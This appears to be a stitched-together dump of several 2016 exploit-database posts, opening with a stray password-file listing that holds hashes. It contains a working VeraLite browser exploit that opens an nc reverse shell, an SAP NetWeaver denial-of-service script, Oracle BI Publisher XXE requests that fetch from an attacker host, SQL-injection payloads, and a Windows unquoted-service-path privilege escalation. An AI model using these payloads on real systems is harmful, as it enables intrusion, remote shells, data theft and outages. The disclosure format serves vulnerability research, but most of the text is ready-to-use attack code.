verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware
1. Description
A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.
2. Proof of Concept
<!--
@about
This file, when loaded in a browser, will attempt to get a reverse shell
on a VeraLite device on the client's network. This is achieved with the
following steps:
1. Acquire the client's internal IP address using webrtc. We then assume the
client is operating on a \24 network.
2. POST :49451/z3n.html to every address on the subnet. This leverages two
things we know to be true about VeraLite:
- there should be a UPnP HTTP server on 49451
- VeraLite uses a libupnp vulnerable to CVE-2016-6255.
3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
successfully created the file via CVE-2016-6255
4. z3n.html will allow us to bypass same origin policy and it will make a
POST request that executes RunLau. This also leverages information we
know to be true about Veralite:
- the control URL for HomeAutomationGateway is /upnp/control/hag
- no auth required
5. Our RunLua code executes a reverse shell to 192.168.217:1270.
@note
This code doesn't run fast in Firefox. This appears to largely be a performance
issue associated with attaching a lot of iframes to a page. Give the shell
popping a couple of minutes. In Chrome, it runs pretty fast but might
exhaust socket usage.
@citations
- WebRTC IP leak: https://github.com/diafygi/webrtc-ips
- Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
- CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script>
/**
* POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
* libupnp then the page will be written. Once the request has
* completed, we attempt to load it in an iframe in order to bypass
* same origin policy. If the page is loaded into the iframe then
* it will make a soap action request with the action RunLua. The
* Lua code will execute a reverse shell.
* @param ip the ip address to request to
* @param frame_id the id of the iframe to create
*/
function create_page(ip, frame_id)
{
payload = "<!DOCTYPE html>\n" +
"<html>\n" +
"<head>\n" +
"<title>Try To See It Once My Way</title>\n" +
"<script>\n" +
"function exec_lua() {\n" +
"soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
"soap_request += \"<s:Body>\";\n" +
"soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
"soap_request += \"<Code>os.execute("/bin/sh -c '(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&'")</Code>\";\n" +
"soap_request += \"</u:RunLua>\";\n" +
"soap_request += \"</s:Body>\";\n" +
"soap_request += \"</s:Envelope>\";\n" +
"xhttp = new XMLHttpRequest();\n" +
"xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
"xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
"xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
"xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
"xhttp.send(soap_request);\n" +
"}\n" +
"</scr\ipt>\n" +
"</head>\n" +
"<body onload=\"exec_lua()\">\n" +
"Zen?\n" +
"</body>\n" +
"</html>";
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://" + ip + ":49451/z3n.html", true);
xhttp.timeout = 1000;
xhttp.onreadystatechange = function()
{
if (xhttp.readyState == XMLHttpRequest.DONE)
{
new_iframe = document.createElement('iframe');
new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
new_iframe.setAttribute("id", frame_id);
new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
document.body.appendChild(new_iframe);
}
};
xhttp.send(payload);
}
/**
* This function abuses the webrtc internal IP leak. This function
* will find the the upper three bytes of network address and simply
* assume that the client is on a \24 network.
*
* Once we have an ip range, we will attempt to create a page on a
* vulnerable libupnp server via create_page().
*/
function spray_and_pray()
{
RTCPeerConnection = window.RTCPeerConnection ||
window.mozRTCPeerConnection ||
window.webkitRTCPeerConnection;
peerConn = new RTCPeerConnection({iceServers:[]});
noop = function() { };
peerConn.createDataChannel("");
peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
peerConn.onicecandidate = function(ice)
{
if (!ice || !ice.candidate || !ice.candidate.candidate)
{
return;
}
clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
peerConn.onicecandidate = noop;
if (clientNetwork && clientNetwork.length > 0)
{
for (i = 0; i < 255; i++)
{
create_page(clientNetwork + '.' + i, "page"+i);
}
}
};
}
</script>
</head>
<body onload="spray_and_pray()">
Everything zen.
</body>
</html>
3. Solution:
No solution exists
'''
Application: SAP NetWeaver KERNEL
Versions Affected: SAP NetWeaver KERNEL 7.0-7.5
Vendor URL: http://SAP.com
Bugs: Denial of Service
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
Reference: SAP Security Note 2295238
Author: Dmitry Yudin (ERPScan)
Description
1. ADVISORY INFORMATION
Title: [ERPSCAN-16-030] SAP NetWeaver – buffer overflow vulnerability
Advisory ID: [ERPSCAN-16-030]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
Date published: 12.10.2016
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Denial of Service
Impact: DoS
Remotely Exploitable: yes
Locally Exploitable: yes
CVSS Information
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)
C : Impact to Confidentiality None (N)
I : Impact to Integrity Low (L)
A : Impact to Availability Low (L)
3. VULNERABILITY DESCRIPTION
This vulnerability allows an attacker to send a special request to the
SAPSTARTSRV process port and conduct stack buffer overflow (recursion)
on the SAP server.
4. VULNERABLE PACKAGES
SAP KERNEL 7.21 32-BIT 625
SAP KERNEL 7.21 32-BIT UNICODE 625
SAP KERNEL 7.21 64-BIT 625
SAP KERNEL 7.21 64-BIT UNICODE 625
SAP KERNEL 7.21 EXT 32-BIT 625
SAP KERNEL 7.21 EXT 32-BIT UC 625
SAP KERNEL 7.21 EXT 64-BIT 625
SAP KERNEL 7.21 EXT 64-BIT UC 625
SAP KERNEL 7.22 64-BIT 113
SAP KERNEL 7.22 64-BIT UNICODE 113
SAP KERNEL 7.22 EXT 64-BIT 113
SAP KERNEL 7.22 EXT 64-BIT UC 113
SAP KERNEL 7.42 64-BIT 412
SAP KERNEL 7.42 64-BIT UNICODE 412
SAP KERNEL 7.45 64-BIT 113
SAP KERNEL 7.45 64-BIT UNICODE 113
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2295238
6. AUTHOR
Dmitry Yudin (ERPScan)
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
'''
import socket
PoC = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xlmns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
> """ + "<a>" * 100000 + "</a>" * 100000 + """ </sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:WW xmlns:ns1="urn:SAPControl">
<b></b>
<e><e>
</ns1:WW>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
for i in range(1,5):
sock = socket.socket()
sock.connect(("SAP_IP", SAP_PORT))
sock.send(PoC)
'''
Windbg exceptions
sapstartsrv!soap_getutf8+0xa:
00000001`4009cd2a e891f9ffff call sapstartsrv!soap_get
(00000001`4009c6c0)
rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0
rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0
rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0
r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000
r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f
r14=00000001409f8ba0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
8. REPORT TIMELINE
Sent: 09.03.2016
Reported: 10.03.2016
Vendor response: 10.03.2016
Date of Public Advisory: 12.07.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/
10. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
11. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScan’s primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
'''
# Exploit Title: Oracle BI Publisher (formerly XML Publisher) - XML External Entity Injection w/o authentication
# Date: 20\10\2016
# Exploit Author: Jakub Palaczynski
# CVE : CVE-2016-3473
# Vendor Homepage: https://www.oracle.com/
# Version: 11.1.1.6.0, 11.1.1.7.0, 11.1.1.9.0, 12.2.1.0.0
# Info: Previous versions may also be vulnerable.
# Google Dork: inurl:xmlpserver or intitle:"Oracle BI Publisher Enterprise Login"
1. Vulnerable SOAP Action: replyToXML
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXML
Host: vulnerablehost
Content-Length: 630
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXML soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXML>
</soapenv:Body>
</soapenv:Envelope>
------------------------------------------------
2. Vulnerable SOAP Action: replyToXMLWithContext
POST /xmlpserver/services/ServiceGateway HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: #replyToXMLWithContext
Host: vulnerablehost
Content-Length: 646
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://xmlns.oracle.com/oxp/service/service_gateway">
<soapenv:Header/>
<soapenv:Body>
<ser:replyToXMLWithContext soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<incomingXML xsi:type="xsd:string"><![CDATA[<?xml version="1.0" encoding="utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://attacker/file.xml">%remote;]>]]></incomingXML>
</ser:replyToXMLWithContext>
</soapenv:Body>
</soapenv:Envelope>
# Exploit Title: SQL Injection in Classifieds Rental Script
# Date: 19 October 2016
# Exploit Author: Arbin Godar
# Website : ArbinGodar.com
# Vendor: www.i-netsolution.com
*----------------------------------------------------------------------------------------------------------------------*
# Proof of Concept SQL Injection/Exploit :
http://localhost/[PATH]/viewproducts.php?catid=PoC%27
# Exploit (using Sqlmap)
---
Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: catid=-1285' OR 8060=8060#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: catid=-9700' OR 1 GROUP BY CONCAT(0x717a627071,(SELECT (CASE WHEN (7055=7055) THEN 1 ELSE 0 END)),0x716a767871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: catid=-4664' UNION ALL SELECT CONCAT(0x717a627071,0x444c6a6547574179515a64414752636446697064764a5a64745042625072666b5954674a58484577,0x716a767871)#
---
# Exploit Title: Realtek High Definition Audio Driver - Unquoted Service Path Privilege Escalation
# Date: 10/19/2016
# Exploit Author: Joey Lane
# Version: 6.0.1.6730
# Tested on: Windows 7 Professional
The Realtek High Definition Audio Driver installs a service with an unquoted service path.
This enables a local privilege escalation vulnerability. To exploit this vulnerability,
a local attacker can insert an executable file in the path of the service.
Rebooting the system or restarting the service will run the malicious executable
with elevated privileges.
This was tested on version 6.0.1.6730, but other versions may be affected as well.
---------------------------------------------------------------------------
C:\>sc qc RtkAudioService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RtkAudioService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
LOAD_ORDER_GROUP : PlugPlay
TAG : 0
DISPLAY_NAME : Realtek Audio Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"Program.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.